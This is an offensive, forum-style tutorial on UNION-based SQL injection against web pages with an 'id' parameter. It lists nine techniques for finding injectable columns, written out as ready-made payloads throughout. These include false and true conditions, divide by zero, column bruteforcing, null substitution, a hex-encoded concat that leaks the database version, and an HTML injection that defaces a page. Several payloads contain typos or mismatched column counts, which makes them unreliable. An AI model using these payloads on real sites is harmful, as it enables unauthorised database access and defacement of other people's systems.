How to find Vulnerable Columns?ANS:-1st Technique:-use -> id = -1 union se

1. How to find Vulnerable Columns?
2. ANS:-
3. 1st Technique:-
4. use -> id = -1 union select 1,2,3,4,5--
5. use -> id = 1111/9999/null/bybysql union select 1,2,3,4,5--
6. use -> id = .1/1.2/12.4 union select 1,2,3,4,5-- [Thanks to Crown sir]
7.  
8. Note:- I use null and bybysql. Not confuse with them u can use watever u like means use dat things which doesn't exist [Thanks to Hack Forum]
9.  
10. 2nd Technique :- False Parameter
11. Here False Parameter means put something that make a wrong response into our SQL PARAMETER like
12. (a) 1=2, 1=0
13. use -> id=1 or 1=2 union select 1,2,3,4,5--
14. use -> id=1 or 1=0 union select 1,2,3,4,5--
15.  
16. (b) Also can we use having, like, <>
17. use -> id=1 having/HAVING 1=2 union select 1,2,3,4,5--
18. use -> id=1 1 like/LIKE 2 union select 1,2,3,4,5--
19. use -> id=1 1 <> 1 union select 1,2,3,4,5--
20. use -> id=1 {having/and} 1 like 2 union select 1,2,3,4,5--
21. use -> id=1 {having/and} 1 <> 1 union select 1,2,3,4,5-- /* use either having or and
22.  
23.  
24. (c) Also u can use and false/AND FALSE statement
25. use -> id=1 and false union select 1,2,3,4,5--
26.  
27. 3rd Technique :- Divide by 0 means -> /0 and +div+0
28. use -> id =12/0 union select 1,2,3,4,5--
29.  
30. use -> id = 12+div+0+ union select 1,2,3,4,5--
31.  
32. 4th Technique :- Look closely, or scratch the HTML source code
33.  
34. The number can potentially be display anywhere, when it's kind of rough, just change the query to make the whole thing more visible to something like
35.  
36. http://somesite.net/b.php?id=12/0 union select 1111,2222,3333,4444,5555--
37.  
38. Above we use 1111 ,2222 instead of 1,2 respectively
39.  
40. After writing dat code open source code then search the 'Column Number' like 1111,2222,3333,4444,5555 by using (CTRL+F :- For finding something in source code) Then check where is dat number appearing in source code
41.  
42. Sometimes the number display on the page title.
43.  
44. When U get the vulnerable columns then u want to display the version,user,database or some html parts to visible on page So 4 dat Follow These Steps :-
45.  
46. i.) id = -1 union select 1111,2222,concat(0x223e,@@version,0x3c696d67207372633d22),4444--
47. Where
48. 223e => ">
49. 3c696d67207372633d22 => <img src="
50. *Remeber we use 0x so dat above hex code works
51.  
52. ii.) 4 print our name
53. id = -1 union select 1111,2222,concat(0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d),4444--
54. Where
55. 0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d => \"><font color = red size=4>AAKASH</font><!--
56.  
57. 5th Technique :-
58. U tried all above technique but stille can't get vulnerable column then u can also use this 5th technique.... Wats new in this technique See :-
59.  
60. u can use union select 1,2,3,4,5-- as union (select 1,2,3,4,5)--
61. use :- id=-2 union (select 1,2,3,4,5)--
62. /* If u see vul col like 3 then
63.  
64. use :- id=-2 union (select 1,2,333(4 check)/@@version,4,5)--
65.  
66. 6th Technique :- True Parameter
67.  
68. use -> id=1 +where+1=1 union select 1,2,3,4,5--
69. use -> id=1 +and+50=50 union select 1,2,3,4,5--
70. use -> id=1 =75=75 union select 1,2,3,4,5--
71.  
72. 7th Technique :- Bruteforcing the column /* Thanks to My Master Devilhunter Dante
73. Frnds when u can't find number of columns then u also can use this techniue. By this technique not only u find number of columns u also get vulnerable columns.
74. Follow the following steps
75. 1st do -> union select 1--
76. 2nd do -> union select 1,2--
77. 3rd do -> union select 1,2,3--
78. 4th do -> union slect 1,2,3,4--
79. 5th do -> union select 1,2,3,4,5--
80.  
81. Do dat steps untill we can't get vulnerabls.
82.  
83. Do above steps untill u cant get vulnerable columns :)
84.  
85. 8th Techniues :- Guessing which number is vulnerable
86. suppose we have union select 1,2,3,4,5,6,7--
87. Then replace numbers with any words u want like :-
88. union select 'hello1','hello2','hello3','hello4','hello5' [Then convert 'hello1' in hex format] OR
89. union select version(),version(),version(),version(),version() [No need to convert] OR
90. union select :1,:2,:3,:4,:5,:6 [Then convert :1 in hex format. I think it is very easy to use and not confusing ]
91.  
92. 9th Techniques:- Using null
93. Friends we can also use null to get vulnerable columns.
94. See this :-
95. union select 1,2,3,4,5,6,7--
96. union select null,2,3,4,5,6,7-- Error [But if 1 is vulnerable den no error]
97. union selecct 1,null,2,3,4,5,6,7-- Error "
98. union select 1,2,null,3,4,5,6,7-- Error "
99. union select 1,2,3,null,4,5,6,7-- No Error [Suppose if 4 is vulnerable den no error]
100. union select 1,2,3,4,null,5,6,7--
101. union select 1,2,3,4,5,null,6,7--
102. union select 1,2,3,4,5,null,7--
103. union select 1,2,3,4,5,6,null --
104.  
105.  
106.  
107.  
108. Thanks and credit goes to
109. 1. Blackhawk
110. 2. Crown
111. 3.BlackRoas
112. 4.Benzi
113. 5.Devilhunter Dante (My Teacher)